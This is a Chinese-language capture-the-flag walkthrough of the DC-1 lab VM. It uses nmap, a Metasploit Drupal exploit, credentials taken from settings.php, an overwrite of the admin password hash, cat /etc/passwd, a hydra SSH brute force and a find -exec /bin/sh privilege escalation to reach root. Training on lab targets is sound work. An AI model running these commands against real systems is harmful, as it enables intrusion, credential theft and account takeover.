DC-1靶机渗透

实验环境

  1. Vmware workstation
  2. kali2020
  3. DC-1
  4. DC-1靶机网卡和kali是一样的
  5. kali 的ip地址:192.168.6.129

主机发现

第一种方法:使用VMware去查看DC-1靶机的MAC地址;第二种方法:直接进行主机发现。用命令扫描网段存活主机。

nmap -sP 192.168.6.0/24

  

 发现靶机IP为:192.168.6.131

信息收集

使用 nmap 扫描常用端口

 发现开放了22,80,111端口,以及主机信息

浏览器访问80端口:

 三大PHP CMS网站:Drupal、 Wordpress、Joomla

漏洞利用

启动metasploit,搜索drupal模块。

可以采用2018-03-28漏洞

 

  

 run之后拿到了会话。

查找flag

查看网站目录结构,发现flag1

 查看flag1

 配置文件在/sites/default/settings.php

于是就找到了flag2

还有这个数据库

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

远程连接一下

权限提升
执行拿shell,shell反弹

python -c 'import pty;pty.spawn("/bin/bash")'

 连接数据库,用户名和密码数据库有

www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t

 接着查看数据库

 

 

 

 这里要破解密文,可以使用暴力破解或者是在数据库中更新密码

使用更新密码:

www-data@DC-1:/var/www$ php scripts/password-hash.sh mima

 进入数据库更新密码

update users set pass="$S$D3hDIvluBADLbum3hEV/k5RdfDVmXG02l2ChwWzyQO/fsJ1Nwzgs" where uid=1;

 然后登录一下,用户名是admin ,密码是mima

发现flag3

 接着找

www-data@DC-1:/var/www$ cat /etc/passwd

发现flag4,该服务器开放了22端口,我们可以使用九头蛇工具爆破密码:

hydra -l flag4 -P /usr/share/john/password.lst 192.168.6.131 ssh -vV -f -o hydra.ssh

拿到密码

 用ssh登录

使用find命令提升权限

shell命令

find ./ aaa -exec '/bin/sh' ; 
whoami
cd /root
ls
cat thefinalflag.txt

看到Well done!!!!,就知道已经结束了,这俩钟头,可以睡个好觉了。

原文地址:https://www.cnblogs.com/tac2664/p/14393876.html